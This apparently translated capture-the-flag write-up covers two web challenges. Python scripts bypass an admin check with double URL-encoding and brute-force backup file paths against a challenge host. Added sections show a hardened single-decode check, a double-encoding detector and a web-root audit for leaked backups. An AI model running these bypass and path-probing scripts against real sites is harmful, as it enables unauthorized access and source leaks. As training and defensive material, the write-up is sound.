Opening the challenge environment shows the following page:

Method 1:

Appending index.phps to the URL reveals leaked source code. Reviewing it shows two conditions on the id value passed via GET: first, the value must not equal admin; second, after a urldecode() call is applied to the GET value, it must equal admin. Construct a payload whose raw form is not "admin" but which urldecode() turns into "admin", and the flag is returned.
Method 2: a Python script

```python
import requests
from urllib.parse import quote

url = 'http://61.147.171.105:52593/index.php?id='
# percent-encode every character of 'admin', then percent-encode the result again
encoded_id = ''.join('%' + hex(ord(c))[2:] for c in 'admin')
encoded_id2 = ''.join('%' + hex(ord(c))[2:] for c in encoded_id)
target_url = url + encoded_id2
print(target_url)
response = requests.get(target_url)
if 'cyberpeace{' in response.text:
    flag_start = response.text.index("cyberpeace{")
    key_end = response.text.index('}', flag_start) + 1
    flag = response.text[flag_start:key_end]
    print("存在 flag:" + flag)
else:
    print("未找到 flag")
```
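The reason the double-encoded value works is that the two comparisons in the leaked source run on different representations of the same parameter: the guard sees the value after the web stack's single decode, the grant sees it after the code's own extra urldecode(). The following is an added example (not the challenge's PHP and not the writeup author's code) that models that logic in Python as a hypothetical reconstruction, puts a hardened version beside it that decodes once and applies every rule to that one canonical value, and adds a small detection heuristic for logs or a WAF: a parameter that still contains %XX sequences after one decode was encoded twice. The flag value is a constructed placeholder.

```python
import re
from urllib.parse import unquote

# Constructed placeholder; the real flag is whatever the challenge server returns.
FLAG = "cyberpeace{constructed_placeholder}"


def pct_encode(s: str) -> str:
    """Percent-encode every character, the way the writeup's script does."""
    return "".join("%{:02x}".format(ord(c)) for c in s)


def handle_request_vulnerable(query_value: str) -> str:
    """Hypothetical reconstruction of the leaked index.phps logic.

    query_value is the raw text after 'id=' in the request line.
    """
    param = unquote(query_value)          # the web stack decodes the query string once
    if param == "admin":
        return "denied"                   # the guard runs on the once-decoded value ...
    param = unquote(param)                # ... then urldecode() decodes a second time ...
    if param == "admin":
        return FLAG                       # ... and the grant runs on the twice-decoded value
    return "no flag"


def handle_request_hardened(query_value: str) -> str:
    """Decode exactly once and apply every rule to that single canonical value."""
    param = unquote(query_value)
    if param == "admin":
        return "denied"
    return "no flag"


ENCODED_OCTET = re.compile(r"%[0-9A-Fa-f]{2}")


def looks_double_encoded(query_value: str) -> bool:
    """Detection heuristic: after one decode a parameter should contain no %XX
    sequences; if it still does, the client encoded it twice."""
    return ENCODED_OCTET.search(unquote(query_value)) is not None


if __name__ == "__main__":
    payload = pct_encode(pct_encode("admin"))
    print(payload)
    print("vulnerable:", handle_request_vulnerable(payload))
    print("hardened:  ", handle_request_hardened(payload))
    print("double-encoded?", looks_double_encoded(payload))
```

The hardened variant has no "grant" branch at all: the deny-admin-then-allow-admin shape only exists as a puzzle, and the general fix is to normalise input once and never decode again after a check has been made on it. The detection heuristic is coarse (a literal "%25" in legitimate data decodes to a lone "%", which it ignores), so it is suited to alerting rather than blocking.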
Opening the challenge environment shows the following page:

Method 1: common backup file suffixes are .git .svn .swp .~ .bak .bash_history; trying them one by one yields the flag.
Method 2: a Python script

```python
import requests

url = 'http://61.147.171.105:49902/'
dictionary = 'php.txt'   # wordlist of candidate paths, one per line
with open(dictionary, "r") as file:
    paths = file.read().splitlines()
for path in paths:
    target_url = url + path
    response = requests.get(target_url)
    if "Cyberpeace{" in response.text:
        flag_start = response.text.index("Cyberpeace")
        flag_end = response.text.index('}', flag_start) + 1
        flag = response.text[flag_start:flag_end]
        print("路径爆破成功:" + target_url)
        print("flag:" + flag)
        break
else:
    # for/else: runs only if the loop finished without a break
    print("路径爆破失败,未找到flag")
```
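The wordlist probing above is the outside view; the same list of names tells a defender what to look for inside the document root before a deployment goes live. The following is an added example (not the challenge's code and not the writeup author's) that walks a web root and reports anything matching the writeup's list of backup-style suffixes and exposed names. The suffix list is taken from the writeup (its ".~" is read as the editor-backup trailing "~", and both spellings are matched); the sample directory tree is constructed inside a temporary directory purely for demonstration.

```python
import os
import tempfile

# Names from the writeup's list. '.~' there is taken to mean the editor-backup
# trailing '~'; both spellings are matched so neither form slips through.
BACKUP_SUFFIXES = (".bak", ".swp", "~", ".~")
EXPOSED_DIRS = {".git", ".svn"}
EXPOSED_FILES = {".bash_history"}


def find_backup_artifacts(webroot: str) -> list:
    """Walk a document root and return, sorted, the relative paths of anything
    that could be fetched by guessing a backup-style name."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        for d in list(dirnames):
            if d in EXPOSED_DIRS:
                findings.append(os.path.relpath(os.path.join(dirpath, d), webroot))
                dirnames.remove(d)      # the whole directory is the finding; skip its contents
        for f in filenames:
            if f in EXPOSED_FILES or f.endswith(BACKUP_SUFFIXES):
                findings.append(os.path.relpath(os.path.join(dirpath, f), webroot))
    return sorted(findings)


def build_sample_webroot() -> str:
    """Constructed sample tree for demonstration only; not a real deployment."""
    root = tempfile.mkdtemp(prefix="webroot_")
    files = [
        "index.php",            # legitimate
        "index.php.bak",        # leftover copy of the source
        ".index.php.swp",       # vim swap file
        ".bash_history",        # shell history dropped into the document root
        ".git/HEAD",            # exposed repository metadata
        "css/style.css",        # legitimate
        "admin/config.php~",    # editor backup in a subdirectory
    ]
    for rel in files:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("sample\n")
    return root


if __name__ == "__main__":
    for path in find_backup_artifacts(build_sample_webroot()):
        print("exposed:", path)
```

Running the audit as a pre-deploy step catches the index.php.bak style leak before anyone has to guess it from outside; the same name list is also the natural input for a deny rule in the web server so that, even if a file is left behind, it is not served.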